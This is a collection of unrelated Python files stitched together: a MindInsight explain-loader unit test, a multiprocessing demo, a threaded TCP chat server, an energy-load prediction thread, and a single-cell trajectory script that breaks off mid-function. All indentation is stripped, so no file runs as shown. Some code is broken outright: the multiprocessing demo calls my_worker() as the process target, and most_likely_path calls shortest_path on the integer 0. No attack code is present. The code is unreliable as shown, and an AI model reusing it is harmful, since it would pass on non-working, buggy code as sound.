# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""UT for explainer.manager.explain_manager"""
import os
import threading
import time
from unittest.mock import patch
from mindinsight.datavisual.data_access.file_handler import FileHandler
from mindinsight.explainer.manager.explain_loader import ExplainLoader
from mindinsight.explainer.manager.explain_loader import _LoaderStatus
from mindinsight.explainer.manager.explain_parser import ExplainParser
def abc():
FileHandler.is_file('aaa')
print('after')
class TestExplainLoader:
"""Test explain loader class."""
@patch.object(ExplainParser, 'list_events')
@patch.object(FileHandler, 'list_dir')
@patch.object(FileHandler, 'is_file')
@patch.object(os, 'stat')
def test_stop(self, mock_stat, mock_is_file, mock_list_dir, mock_list_events):
"""Test stop function."""
mock_is_file.return_value = True
mock_list_dir.return_value = ['events.summary.123.host_explain']
mock_list_events.return_value = (True, False, None)
class _MockStat:
def __init__(self, _):
self.st_ctime = 1
self.st_mtime = 1
self.st_size = 1
mock_stat.side_effect = _MockStat
loader = ExplainLoader(
loader_id='./summary_dir',
summary_dir='./summary_dir')
def _stop_loader(explain_loader):
time.sleep(0.01)
assert explain_loader.status == _LoaderStatus.LOADING.value
explain_loader.stop()
thread = threading.Thread(target=_stop_loader, args=[loader], daemon=True)
thread.start()
loader.load()
assert loader.status == _LoaderStatus.STOP.value
|
multiprocessing_1.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
def my_worker():
print("Currently Executing Child Process")
print("This process has it's own instance of the GIL")
print("Executing Main Process")
print("Creating Child Process")
def main():
my_process = multiprocessing.Process(target=my_worker())
my_process.start()
my_process.join()
print("Child Process has terminated, terminating main process")
if __name__ == '__main__':
main()
|
server.py
|
import socketserver as ss
import threading
from socket import socket
from typing import Dict
from .ReqHandler import ReqHandler
class Server(ss.ThreadingTCPServer, ss.TCPServer):
"""
my socket server
"""
PORT = 20307
ADDR = '0.0.0.0'
running: bool = True
clients: Dict[str, ReqHandler] = {}
usernames: Dict[str, str] = {}
socket: socket
def __init__(self):
super().__init__( (self.ADDR, self.PORT), ReqHandler)
print('starting server')
self.Thread = threading.Thread(target=self.serve_forever, daemon=True)
self.Thread.start()
print('server started')
print(f'listening on {self.ADDR}:{self.PORT}')
def send(self, msg: str, sender: str):
raw_msg = msg.encode()
toRemove = []
for key, value in self.clients.items():
if key == sender:
continue
try:
value.send( msg=raw_msg )
except OSError:
toRemove.append( key )
for i in toRemove:
del self.clients[i]
if __name__ == '__main__':
with Server() as server:
try:
while True:
pass
except KeyboardInterrupt:
server.server_close()
server.socket.detach()
|
prediction.py
|
import datetime
import json
import os
import threading
import time
from queue import Queue
from optimization.forecastPublisher import ForecastPublisher
from prediction.errorReporting import ErrorReporting
from prediction.machineLearning import MachineLearning
from prediction.predictionDataManager import PredictionDataManager
from prediction.rawLoadDataReceiver import RawLoadDataReceiver
from utils_intern.constants import Constants
from utils_intern.timeSeries import TimeSeries
from utils_intern.utilFunctions import UtilFunctions
class Prediction(MachineLearning, threading.Thread):
"""
- As soon as the number of data points is num_timesteps, prediction starts
- If model_base.h5 present in disk
then present then use model_base.h5
else load model_temp.h5 from disk (temp pre-trained model)
- predict for next horizon points (eg. 24 predictions)
"""
def __init__(self, config, control_frequency, horizon_in_steps, topic_name, topic_param, dT_in_seconds, id,
output_config, type, opt_values):
super(Prediction, self).__init__(config, horizon_in_steps, topic_name, dT_in_seconds, id, type, opt_values)
self.stopRequest = threading.Event()
self.control_frequency = 60
self.output_config = output_config
self.prediction_data_file_container = os.path.join("/usr/src/app", "prediction/resources", self.id,
"prediction_data_" + str(topic_name) + ".csv")
self.error_result_file_path = os.path.join("/usr/src/app", "prediction/resources", self.id,
"error_data_" + str(topic_name) + ".csv")
self.max_file_size_mins = config.getint("IO", str(self.type)+".raw.data.file.size", fallback=10800)
self.copy_prediction_file_data_to_influx()
total_mins = int(float(self.input_size * self.model_data_dT) / 60.0) + 1
self.raw_data = RawLoadDataReceiver(topic_param, config, total_mins,
self.raw_data_file_container, self.topic_name, self.id, True,
self.max_file_size_mins, self.influxDB)
self.q = Queue(maxsize=0)
forecast_topic = config.get("IO", "forecast.topic")
forecast_topic = json.loads(forecast_topic)
forecast_topic["topic"] = forecast_topic["topic"] + self.topic_name
self.forecast_pub = ForecastPublisher(forecast_topic, config, self.q,
60, self.topic_name, self.id,
self.horizon_in_steps, self.dT_in_seconds)
self.forecast_pub.start()
error_topic_params = config.get("IO", "error.topic")
error_topic_params = json.loads(error_topic_params)
error_topic_params["topic"] = error_topic_params["topic"] + self.topic_name
self.error_reporting = ErrorReporting(config, id, topic_name, dT_in_seconds, control_frequency,
horizon_in_steps, self.prediction_data_file_container,
self.raw_data_file_container, error_topic_params,
self.error_result_file_path, self.output_config, self.influxDB)
self.error_reporting.start()
self.old_predictions = []
self.prediction_save_thread = threading.Thread(target=self.save_to_file_cron)
self.prediction_save_thread.start()
def run(self):
while not self.stopRequest.is_set():
if not self.redisDB.get_bool(Constants.get_data_flow_key(self.id)):
time.sleep(30)
continue
try:
data = self.raw_data.get_raw_data()
self.logger.debug("len data = " + str(len(data)))
data = TimeSeries.expand_and_resample(data, 60)
self.logger.debug("len resample data = " + str(len(data)))
true_data = data
if len(data) > 0:
data = self.processingData.append_mock_data(data, self.input_size, 60)
self.logger.debug("len appended data = " + str(len(data)))
if len(data) > self.input_size:
st = time.time()
test_predictions = []
model, graph = self.models.get_model(self.id + "_" + self.topic_name, True, self.redisDB)
predicted_flag = False
if model is not None and graph is not None:
if self.type == "load":
Xtest, Xmax, Xmin, latest_timestamp = self.processingData.preprocess_data_predict_load(data,
self.input_size)
else:
Xtest, Xmax, Xmin, latest_timestamp = self.processingData.preprocess_data_predict_pv(data,
self.input_size,
self.input_size_hist)
try:
self.logger.debug(
"model present, so predicting data for " + str(self.id) + " " + str(self.topic_name))
from prediction.predictModel import PredictModel
predictModel = PredictModel(self.stop_request_status)
prediction_time = time.time()
test_predictions = predictModel.predict_next_horizon(model, Xtest, self.batch_size, graph, self.type)
self.logger.debug("Prediction successful for " + str(self.id) + " " + str(self.topic_name) +
" which took "+str(time.time()-prediction_time) + " seconds")
predicted_flag = True
except Exception as e:
predicted_flag = False
self.models.remove_saved_model()
self.logger.error("exception when prediction using model : " + str(e))
if predicted_flag:
test_predictions = self.processingData.postprocess_data(test_predictions, latest_timestamp,
self.dT_in_seconds,
self.horizon_in_steps, Xmax, Xmin)
self.logger.debug("predictions values Xmax "+str(Xmax)+" Xmin "+str(Xmin))
self.q.put(test_predictions)
self.old_predictions.append(test_predictions)
if not predicted_flag:
self.logger.info("prediction model is none, extending the known values")
data = TimeSeries.expand_and_resample(true_data, self.dT_in_seconds)
test_predictions = self.processingData.get_regression_values(data, self.input_size,
self.output_size + 1,
self.dT_in_seconds)
self.q.put(test_predictions)
self.logger.debug(str(self.topic_name) + " predictions " + str(len(test_predictions)))
st = time.time() - st
ss = self.control_frequency - st
if ss < 0:
ss = 0
time.sleep(ss)
else:
time.sleep(1)
except Exception as e:
self.logger.error(str(self.topic_name) + " prediction thread exception " + str(e))
def save_to_file_cron(self):
self.logger.debug("Started save file cron")
while True and not self.stopRequest.is_set():
self.old_predictions = PredictionDataManager.save_predictions_to_influx(self.influxDB,
self.old_predictions,
self.horizon_in_steps,
self.topic_name, self.id)
time.sleep(UtilFunctions.get_sleep_secs(1, 0, 0))
def copy_prediction_file_data_to_influx(self):
data_file = PredictionDataManager.get_prediction_data(self.prediction_data_file_container, self.topic_name)
if len(data_file) > 0:
data = PredictionDataManager.save_predictions_dict_to_influx(self.influxDB, data_file,
self.horizon_in_steps, self.topic_name, self.id)
if len(data) == 0:
PredictionDataManager.del_predictions_to_file(self.prediction_data_file_container, self.topic_name)
def Stop(self):
self.logger.info("start prediction thread exit")
if self.forecast_pub:
self.logger.info("Stopping load forecast thread")
self.forecast_pub.Stop()
if self.error_reporting:
self.error_reporting.Stop()
if self.raw_data:
self.raw_data.exit()
self.stopRequest.set()
if self.isAlive():
self.join(4)
self.logger.info("prediction thread exited")
def stop_request_status(self):
return self.stopRequest.is_set()
|
Viav022.py
|
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix, csgraph
import scipy
import igraph as ig
import leidenalg
import time
import hnswlib
import matplotlib.pyplot as plt
import matplotlib
import math
import multiprocessing
from scipy.sparse.csgraph import minimum_spanning_tree
from scipy import sparse
from sklearn.metrics.pairwise import euclidean_distances
import umap
import scanpy as sc
from MulticoreTSNE import MulticoreTSNE as TSNE
import random
from scipy.sparse.csgraph import connected_components
import pygam as pg
import matplotlib.colors as colors
import matplotlib.cm as cm
import palantir #/home/shobi/anaconda3/envs/ViaEnv/lib/python3.7/site-packages/palantir
from termcolor import colored
# jan2020 Righclick->GIT->Repository-> PUSH
def plot_sc_pb(ax, embedding, prob, ti):
#threshold = #np.percentile(prob, 95)#np.mean(prob) + 3 * np.std(prob)
#print('thresold', threshold, np.max(prob))
#prob = [x if x < threshold else threshold for x in prob]
prob = np.sqrt(prob)# scale values to improve visualization of colors
cmap = matplotlib.cm.get_cmap('viridis')
norm = matplotlib.colors.Normalize(vmin=0, vmax=np.max(prob))
prob = np.asarray(prob)
print('prob plot stats', min(prob), max(prob), np.mean(prob))
#changing the alpha transapency parameter for plotting points
c = cmap(norm(prob))
c = c.reshape(-1, 4)
loc_c = np.where(prob <= 0.3)[0]
c[loc_c, 3] = 0.2
loc_c = np.where((prob > 0.3) & (prob <= 0.5))[0]
c[loc_c, 3] = 0.5
loc_c = np.where((prob > 0.5) & (prob <= 0.7))[0]
c[loc_c, 3] = 0.8
loc_c = np.where((prob >0.7))[0]
c[loc_c, 3] = 0.8
ax.scatter(embedding[:, 0], embedding[:, 1], c=c, s=10, cmap='viridis',
edgecolors='none')
ax.set_title('Target: ' + str(ti))
def simulate_multinomial(vmultinomial):
r = np.random.uniform(0.0, 1.0)
CS = np.cumsum(vmultinomial)
CS = np.insert(CS, 0, 0)
m = (np.where(CS < r))[0]
nextState = m[len(m) - 1]
return nextState
def sc_loc_ofsuperCluster_PCAspace(p0, p1,idx):
# ci_list: single cell location of average location of supercluster based on embedded space hnsw
#Returns location (index) in unsampled PCA space of the location of the super-cluster or sub-terminal-cluster and root
print("dict of terminal state pairs, Super: sub: ", p1.dict_terminal_super_sub_pairs)
p0_labels = np.asarray(p0.labels)
p1_labels = np.asarray(p1.labels)
p1_sc_markov_pt = p1.single_cell_pt_markov
ci_list = []
for ci in list(set(p0.labels)):
if ci in p1.revised_super_terminal_clusters: # p0.terminal_clusters:
loc_i = np.where(p1_labels == p1.dict_terminal_super_sub_pairs[ci])[0]
# loc_i = np.where(p0_labels == ci)[0]
# val_pt = [p1.single_cell_pt_markov[i] for i in loc_i]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 0) # 80
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
temp = np.mean(p0.data[loc_i], axis=0)
labelsq, distances = p0.knn_struct.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
elif ci in p0.root:
loc_root = np.where(np.asarray(p0.root) == ci)[0][0]
print('loc root', loc_root)
p1_root_label = p1.root[loc_root]
loc_i = np.where(np.asarray(p1_labels) == p1_root_label)[0]
#print('loc_i', loc_i)
#print('len p1')
# loc_i = np.where(p0.labels == ci)[0]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 20) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] <= th_pt]
temp = np.mean(p0.data[loc_i], axis=0)
labelsq, distances = p0.knn_struct.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
else:
# loc_i = np.where(np.asarray(p0.labels) == ci)[0]
loc_i = np.where(p0_labels == ci)[0]
temp = np.mean(p0.data[loc_i], axis=0)
labelsq, distances = p0.knn_struct.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
X_ds = p0.data[idx]
p_ds = hnswlib.Index(space='l2', dim=p0.data.shape[1])
p_ds.init_index(max_elements=X_ds.shape[0], ef_construction=200, M=16)
p_ds.add_items(X_ds)
p_ds.set_ef(50)
new_superclust_index_ds = []
for item in ci_list:
labelsq, distances = p_ds.knn_query(p0.data[item, :], k=1)
new_superclust_index_ds.append(labelsq[0][0])
return new_superclust_index_ds
def sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx):
# ci_list: single cell location of average location of supercluster based on embedded space hnsw
# idx is the indices of the subsampled elements
knn_hnsw = hnswlib.Index(space='l2', dim=embedding.shape[1])
knn_hnsw.init_index(max_elements=embedding.shape[0], ef_construction=200, M=16)
knn_hnsw.add_items(embedding)
knn_hnsw.set_ef(50)
p0_labels = np.asarray(p0.labels)[idx]
p1_labels = np.asarray(p1.labels)[idx]
p1_sc_markov_pt = list(np.asarray(p1.single_cell_pt_markov)[idx])
ci_list = []
for ci in list(set(p0.labels)):
if ci in p1.revised_super_terminal_clusters: # p0.terminal_clusters:
loc_i = np.where(p1_labels == p1.dict_terminal_super_sub_pairs[ci])[0]
# loc_i = np.where(p0_labels == ci)[0]
# val_pt = [p1.single_cell_pt_markov[i] for i in loc_i]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 80) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
elif ci in p0.root:
loc_root = np.where(np.asarray(p0.root) == ci)[0][0]
print('loc root', loc_root)
p1_root_label = p1.root[loc_root]
loc_i = np.where(np.asarray(p1_labels) == p1_root_label)[0]
#print('loc_i', loc_i)
#print('len p1')
# loc_i = np.where(p0.labels == ci)[0]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 20) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] <= th_pt]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
else:
# loc_i = np.where(np.asarray(p0.labels) == ci)[0]
loc_i = np.where(p0_labels == ci)[0]
# temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
labelsq, distancesq = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]), k=1)
# labels, distances = p.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
return knn_hnsw, ci_list
def draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, G, idx, X_data):
# G is the igraph knn (low K) used for shortest path. no idx needed as it's made on full sample
# knn_hnsw is the knn made in the embedded space used for query
# X_data is the PCA space with all samples
# idx is the selected indices of the downsampled samples
y_root = []
x_root = []
root1_list = []
p1_sc_bp = p1.single_cell_bp[idx, :]
p1_labels = np.asarray(p1.labels)[idx]
p1_sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov)[idx])
p1_cc = p1.connected_comp_labels
X_ds = X_data[idx, :]
p_ds = hnswlib.Index(space='l2', dim=X_ds.shape[1])
p_ds.init_index(max_elements=X_ds.shape[0], ef_construction=200, M=16)
p_ds.add_items(X_ds)
p_ds.set_ef(50)
for ii, r_i in enumerate(p1.root):
loc_i = np.where(p1_labels == p1.root[ii])[0]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
labels_root, distances_root = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]),
k=1) # sc location in embedded space of root cell
x_root.append(embedding[labels_root, 0][0])
y_root.append(embedding[labels_root, 1][0])
labelsroot1, distances1 = p1.knn_struct.knn_query(X_ds[labels_root[0][0], :],
k=1) # index of sc-root-cell in the full-PCA space. Need for path
root1_list.append(labelsroot1[0][0])
# single-cell branch probability evolution probability
for i, ti in enumerate(p1.terminal_clusters):
#print('i, ti, p1.root, p1.connected', i, ti, p1.root, p1_cc)
#print('root1list', root1_list)
root_i = p1.root[p1_cc[ti]]
xx_root = x_root[p1_cc[ti]]
yy_root = y_root[p1_cc[ti]]
fig, ax = plt.subplots()
plot_sc_pb(ax, embedding, p1_sc_bp[:, i], ti)
loc_i = np.where(p1_labels == ti)[0]
val_pt = [p1_sc_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 50) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
x = [embedding[xi, 0] for xi in
loc_i] # location of sc nearest to average location of terminal clus in the EMBEDDED space
y = [embedding[yi, 1] for yi in loc_i]
labels, distances = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]),
k=1) # knn_hnsw is knn of embedded space
x_sc = embedding[labels[0], 0] # terminal sc location in the embedded space
y_sc = embedding[labels[0], 1]
start_time = time.time()
labelsq1, distances1 = p1.knn_struct.knn_query(X_ds[labels[0][0], :],
k=1) # find the nearest neighbor in the PCA-space full graph
print('labels root and labels[0]', root1_list[p1_cc[ti]], labels[0])
## path = G.get_shortest_paths(labels_root[0][0], to=labels[0][0], weights='weight') #G is the knn of all sc points
# path = G.get_shortest_paths(labelsroot1[0][0], to=labelsq1[0][0], weights='weight') # G is the knn of all sc points
path = G.get_shortest_paths(root1_list[p1_cc[ti]], to=labelsq1[0][0],
weights='weight') # G is the knn of all sc points
path_idx = [] # find the single-cell which is nearest to the average-location of a terminal cluster
# get the nearest-neighbor in this downsampled PCA-space graph. These will make the new path-way points
for pii in path[0]:
labelsq, distances = p_ds.knn_query(X_data[pii, :], k=1)
# print('location of pathway point in idx-space', labelsq[0][0])
path_idx.append(labelsq[0][0])
print(f"get_shortest_paths time: {time.time()-start_time}")
#print('path', path)
#print('new path indices', path_idx)
path = path_idx
n_orange = len(path)
orange_m = np.zeros((n_orange, 3))
for enum_point, point in enumerate(path):
#ax.text(embedding[point, 0], embedding[point, 1], 'D ' + str(enum_point), color='blue', fontsize=8)
orange_m[enum_point, 0] = embedding[point, 0]
orange_m[enum_point, 1] = embedding[point, 1]
orange_m[enum_point, 2] = p1_sc_pt_markov[ point]
from sklearn.neighbors import NearestNeighbors
k_orange = 3 # increasing can smoothen in simple trajectories (Toy)
nbrs = NearestNeighbors(n_neighbors=k_orange, algorithm='ball_tree').fit(orange_m[:, 0:])
distances, indices = nbrs.kneighbors(orange_m[:, 0:])
row_list = []
col_list = []
dist_list = []
for i_or in range(n_orange):
for j_or in range(1, k_orange):
row_list.append(i_or)
col_list.append(indices[i_or, j_or])
dist_list.append(distances[i_or, j_or])
print('target number ' + str(ti))
orange_adjacency_knn = csr_matrix((np.array(dist_list), (np.array(row_list), np.array(col_list))),
shape=(n_orange, n_orange))
print('orange adj knn shape', orange_adjacency_knn.shape)
n_mst, comp_labels_mst = connected_components(csgraph=orange_adjacency_knn, directed=False, return_labels=True)
for enum_point, point in enumerate(path): # [0]):
orange_m[enum_point, 2] = p1_sc_pt_markov[point] * p1_sc_pt_markov[
point] * 2 # p1.single_cell_pt_markov[point] * p1.single_cell_pt_markov[point]*2
while n_mst > 1:
comp_root = comp_labels_mst[0]
# print('comp-root', comp_root)
min_ed = 9999999
loc_comp_i = np.where(comp_labels_mst == comp_root)[0]
loc_comp_noti = np.where(comp_labels_mst != comp_root)[0]
# print('compi', loc_comp_i)
# print('comp_noti', loc_comp_noti)
orange_pt_val = [orange_m[cc, 2] for cc in loc_comp_i]
loc_comp_i_revised = [loc_comp_i[cc] for cc in range(len(orange_pt_val)) if
orange_pt_val[cc] >= np.percentile(orange_pt_val, 70)]
for nn_i in loc_comp_i_revised:
ed = euclidean_distances(orange_m[nn_i, :].reshape(1, -1), orange_m[loc_comp_noti])
if np.min(ed) < min_ed:
ed_where_min = np.where(ed[0] == np.min(ed))[0][0]
# print('ed where min', ed_where_min, np.where(ed[0] == np.min(ed)))
min_ed = np.min(ed)
ed_loc_end = loc_comp_noti[ed_where_min]
ed_loc_start = nn_i
# print('min ed', min_ed)
print('Connecting components before sc-bp-GAM: the closest pair of points', ed_loc_start, ed_loc_end)
orange_adjacency_knn[ed_loc_start, ed_loc_end] = min_ed
n_mst, comp_labels_mst = connected_components(csgraph=orange_adjacency_knn, directed=False,
return_labels=True)
if n_mst == 1: #if no disconnected components in the graph
(orange_sources, orange_targets) = orange_adjacency_knn.nonzero()
orange_edgelist = list(zip(orange_sources.tolist(), orange_targets.tolist()))
G_orange = ig.Graph(n=orange_adjacency_knn.shape[0], edges=orange_edgelist,
edge_attrs={'weight': orange_adjacency_knn.data.tolist()}, )
path_orange = G_orange.get_shortest_paths(0, to=orange_adjacency_knn.shape[0] - 1, weights='weight')[0]
print('path orange', path_orange)
len_path_orange = len(path_orange)
for path_i in range(len_path_orange - 1):
path_x_start = orange_m[path_orange[path_i], 0]
path_x_end = orange_m[path_orange[path_i + 1], 0]
orange_x = [orange_m[path_orange[path_i], 0], orange_m[path_orange[path_i + 1], 0]]
orange_minx = min(orange_x)
orange_maxx = max(orange_x)
orange_y = [orange_m[path_orange[path_i], 1], orange_m[path_orange[path_i + 1], 1]]
orange_miny = min(orange_y)
orange_maxy = max(orange_y)
orange_embedding_sub = embedding[
((embedding[:, 0] <= orange_maxx) & (embedding[:, 0] >= orange_minx)) & (
(embedding[:, 1] <= orange_maxy) & ((embedding[:, 1] >= orange_miny)))]
if (orange_maxy - orange_miny > 5) | (orange_maxx - orange_minx > 5):
orange_n_reps = 150
else:
orange_n_reps = 100
or_reps = np.repeat(np.array([[orange_x[0], orange_y[0]]]), orange_n_reps, axis=0)
orange_embedding_sub = np.concatenate((orange_embedding_sub, or_reps), axis=0)
or_reps = np.repeat(np.array([[orange_x[1], orange_y[1]]]), orange_n_reps, axis=0)
orange_embedding_sub = np.concatenate((orange_embedding_sub, or_reps), axis=0)
orangeGam = pg.LinearGAM(n_splines=8, spline_order=3, lam=10).fit(orange_embedding_sub[:, 0],
orange_embedding_sub[:, 1])
nx_spacing = 100
orange_GAM_xval = np.linspace(orange_minx, orange_maxx, nx_spacing * 2)
yg_orange = orangeGam.predict(X=orange_GAM_xval)
ax.plot(orange_GAM_xval, yg_orange, color='dimgrey', linewidth=2, zorder=3, linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
cur_x1 = orange_GAM_xval[-1]
cur_y1 = yg_orange[-1]
cur_x2 = orange_GAM_xval[0]
cur_y2 = yg_orange[0]
if path_i >= 1:
for mmddi in range(2):
xy11 = euclidean_distances(np.array([cur_x1, cur_y1]).reshape(1, -1),
np.array([prev_x1, prev_y1]).reshape(1, -1))
xy12 = euclidean_distances(np.array([cur_x1, cur_y1]).reshape(1, -1),
np.array([prev_x2, prev_y2]).reshape(1, -1))
xy21 = euclidean_distances(np.array([cur_x2, cur_y2]).reshape(1, -1),
np.array([prev_x1, prev_y1]).reshape(1, -1))
xy22 = euclidean_distances(np.array([cur_x2, cur_y2]).reshape(1, -1),
np.array([prev_x2, prev_y2]).reshape(1, -1))
mmdd_temp_array = np.asarray([xy11, xy12, xy21, xy22])
mmdd_loc = np.where(mmdd_temp_array == np.min(mmdd_temp_array))[0][0]
if mmdd_loc == 0:
ax.plot([cur_x1, prev_x1], [cur_y1, prev_y1], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if mmdd_loc == 1:
ax.plot([cur_x1, prev_x2], [cur_y1, prev_y2], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if mmdd_loc == 2:
ax.plot([cur_x2, prev_x1], [cur_y2, prev_y1], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if mmdd_loc == 3:
ax.plot([cur_x2, prev_x2], [cur_y2, prev_y2], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if (path_x_start > path_x_end): direction_arrow_orange = -1 # going LEFT
if (path_x_start <= path_x_end): direction_arrow_orange = 1 # going RIGHT
if (abs(
path_x_start - path_x_end) > 2.5): # |(abs(orange_m[path_i, 2] - orange_m[path_i + 1, 1]) > 1)):
if (direction_arrow_orange == -1): # & :
ax.arrow(orange_GAM_xval[nx_spacing], yg_orange[nx_spacing],
orange_GAM_xval[nx_spacing - 1] - orange_GAM_xval[nx_spacing],
yg_orange[nx_spacing - 1] - yg_orange[nx_spacing], shape='full', lw=0,
length_includes_head=True,
head_width=0.5, color='dimgray', zorder=3)
if (direction_arrow_orange == 1): # &(abs(orange_m[path_i,0]-orange_m[path_i+1,0])>0.5):
ax.arrow(orange_GAM_xval[nx_spacing], yg_orange[nx_spacing],
orange_GAM_xval[nx_spacing + 1] - orange_GAM_xval[nx_spacing],
yg_orange[nx_spacing + 1] - yg_orange[nx_spacing], shape='full', lw=0,
length_includes_head=True,
head_width=0.5,
color='dimgray', zorder=3)
prev_x1 = cur_x1
prev_y1 = cur_y1
prev_x2 = cur_x2
prev_y2 = cur_y2
ax.scatter(x_sc, y_sc, color='pink', zorder=3, label=str(ti), s=22)
ax.text(x_sc + 0.5, y_sc + 0.5, 'TS ' + str(ti), color='black')
return
def get_biased_weights(edgelist, weights, pt, round_no=1):
# print('weights', type(weights), weights)
# small nu means less biasing (0.5 is quite mild)
# larger nu (in our case 1/nu) means more aggressive biasing https://en.wikipedia.org/wiki/Generalised_logistic_function
print(len(edgelist), len(weights))
bias_weight = []
if round_no == 1:
b = 1 # 1 # 0.5
else:
b = 20 # 20 twenty is used for all the CD34 Human cells
K = 1
c = 0
C = 1
nu = 1
high_weights_th = np.mean(weights)
high_pt_th = np.percentile(np.asarray(pt), 80)
loc_high_weights = np.where(weights > high_weights_th)[0]
loc_high_pt = np.where(np.asarray(pt) > high_pt_th)[0]
#print('weight hi th', high_weights_th)
#print('loc hi pt', loc_high_pt)
# print('loc hi weight', loc_high_weights)
#print('edges of high weight', [edgelist[i] for i in loc_high_weights])
edgelist_hi = [edgelist[i] for i in loc_high_weights]
for i in loc_high_weights:
# print('loc of high weight along edgeweight', i)
start = edgelist[i][0]
end = edgelist[i][1]
# print('start and end node', start, end)
if (start in loc_high_pt) | (end in loc_high_pt):
# print("found a high pt high weight node", (start, end), pt[start], pt[end])
weights[i] = 0.5 * np.mean(weights)
upper_lim = np.percentile(weights, 90) # 80
lower_lim = np.percentile(weights, 10) # 20
weights = [i if i <= upper_lim else upper_lim for i in weights]
weights = [i if i >= lower_lim else lower_lim for i in weights]
for i, (start, end) in enumerate(edgelist):
# print('i, start, end', i, start, end)
Pt_a = pt[start]
Pt_b = pt[end]
P_ab = weights[i]
t_ab = Pt_a - Pt_b
Bias_ab = K / ((C + math.exp(b * (t_ab + c)))) ** nu
new_weight = (Bias_ab * P_ab)
bias_weight.append(new_weight)
# print('tab', t_ab, 'pab', P_ab, 'biased_pab', new_weight)
print('original weights', len(weights), list(enumerate(zip(edgelist, weights))))
print('bias weights', list(enumerate(zip(edgelist, bias_weight))))
#print('length bias weights', len(bias_weight))
# bias_weight=np.asarray(bias_weight)
# bias_weight = (bias_weight-np.min(bias_weight)+0.1)/(np.max(bias_weight)-np.min(bias_weight)+0.1)
return list(bias_weight)
def expected_num_steps(start_i, N):
n_t = N.shape[0]
N_steps = np.dot(N, np.ones(n_t))
n_steps_i = N_steps[start_i]
return n_steps_i
def absorption_probability(N, R, absorption_state_j):
M = np.dot(N, R)
vec_prob_end_in_j = M[:, absorption_state_j]
return M, vec_prob_end_in_j
def most_likely_path(P_transition_absorbing_markov, start_i, end_i):
graph_absorbing_markov = 0 # ig() log weight them
shortest_path = graph_absorbing_markov.shortest_path(start_i, end_i)
print('the shortest path beginning at ', start_i, 'and ending in ', end_i, 'is:')
return shortest_path
def draw_trajectory_gams(X_dimred, sc_supercluster_nn, cluster_labels, super_cluster_labels, super_edgelist, x_lazy,
alpha_teleport,
projected_sc_pt, true_label, knn, ncomp, final_super_terminal, sub_terminal_clusters,
title_str="hitting times", ):
x = X_dimred[:, 0]
y = X_dimred[:, 1]
df = pd.DataFrame({'x': x, 'y': y, 'cluster': cluster_labels, 'super_cluster': super_cluster_labels,
'projected_sc_pt': projected_sc_pt},
columns=['x', 'y', 'cluster', 'super_cluster', 'projected_sc_pt'])
df_mean = df.groupby('cluster', as_index=False).mean()
sub_cluster_isin_supercluster = df_mean[['cluster', 'super_cluster']]
print('sub_cluster_isin_supercluster', sub_cluster_isin_supercluster)
sub_cluster_isin_supercluster = sub_cluster_isin_supercluster.sort_values(by='cluster')
sub_cluster_isin_supercluster['int_supercluster'] = sub_cluster_isin_supercluster['super_cluster'].round(0).astype(
int)
print('sub_cluster_isin_supercluster', sub_cluster_isin_supercluster)
print('final_super_terminal', final_super_terminal)
df_super_mean = df.groupby('super_cluster', as_index=False).mean()
pt = df_super_mean['projected_sc_pt'].values
pt_int = [int(i) for i in pt]
pt_str = [str(i) for i in pt_int]
pt_sub = [str(int(i)) for i in df_mean['projected_sc_pt'].values]
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
num_parc_group = len(set(true_label))
line = np.linspace(0, 1, num_parc_group)
for color, group in zip(line, set(true_label)):
where = np.where(np.array(true_label) == group)[0]
ax1.scatter(X_dimred[where, 0], X_dimred[where, 1], label=group, c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend(fontsize=6)
ax1.set_title('true labels, ncomps:' + str(ncomp) + '. knn:' + str(knn))
for e_i, (start, end) in enumerate(super_edgelist):
if pt[start] >= pt[end]:
temp = end
end = start
start = temp
x_i_start = df[df['super_cluster'] == start]['x'].values # groupby('cluster').mean()['x'].values
y_i_start = df[df['super_cluster'] == start]['y'].values # .groupby('cluster').mean()['y'].values
x_i_end = df[df['super_cluster'] == end]['x'].values # .groupby('cluster').mean()['x'].values
y_i_end = df[df['super_cluster'] == end]['y'].values # groupby('cluster').mean()['y'].values
direction_arrow = 1
